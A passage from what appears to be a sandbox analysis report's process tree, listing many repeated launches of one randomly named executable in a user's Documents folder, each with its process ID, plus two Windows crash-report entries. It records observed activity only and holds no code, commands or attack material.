        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5752
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3796
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5248
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5052
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:1912
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5156
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:1088
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:2264
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3948
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:2188
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6804
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5764
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6720
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5448
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6872
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6216
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:2100
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:7844
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 28
        7⤵
        Program crash
        
        PID:7776
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:7552
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8160
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6288
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:7620
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5896
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:7324
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:4496
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6236
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:1256
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5760
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6728
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3320
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5344
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8000
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5520
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6104
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3684
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8200
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8888
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8220
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8356
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8960
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8960 -s 28
        7⤵
        Program crash
        
        PID:5744
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3132
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3036
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9172
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9436
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9324
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9556
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10180
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10280
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11012
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10232
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6396
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11468
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12252
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11184
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:4296
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9680
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10316
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:5876
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:1520
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12632
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13184
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13320
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13928
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14228
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10892
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14992
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14380
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14780
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15312
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15120
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12264
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11700
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9600
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14852
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13456
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13168
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15520
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16212
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15436
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14004
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:4860
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:1268
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11752
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13240
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:9908
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16656
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:3176
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17008
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16764
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12512
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11688
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12984
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15584
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13388
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14992
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15196
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14940
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18176
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17432
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18248
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15004
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18272
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8812
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19188
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10960
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14816
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18676
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17108
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16472
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19032
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19488
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19780
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15808
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16644
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20364
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:11188
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10412
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:19924
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17612
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18860
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20728
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:21236
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:15156
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:21084
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20692
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:10884
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20672
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17692
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:8532
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16888
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20604
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18804
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:20332
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:12780
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22344
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:18312
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:4588
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:6420
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22340
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:17720
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:14644
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22668
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:13508
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22940
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:7664
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22372
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:16700
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        6⤵
        
        PID:22664
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
